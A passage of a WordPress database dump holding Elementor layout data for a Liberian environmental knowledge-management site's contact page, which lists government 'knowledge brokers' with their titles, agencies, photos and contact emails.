column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>Monitoring, Control, and Surveillance Field Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>Small Scale Fisheries Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23555,3429,'_elementor_edit_mode','builder'),(23556,3429,'_elementor_template_type','wp-page'),(23557,3429,'_elementor_version','3.0.16'),(23558,3429,'_wp_page_template','default'),(23559,3429,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a 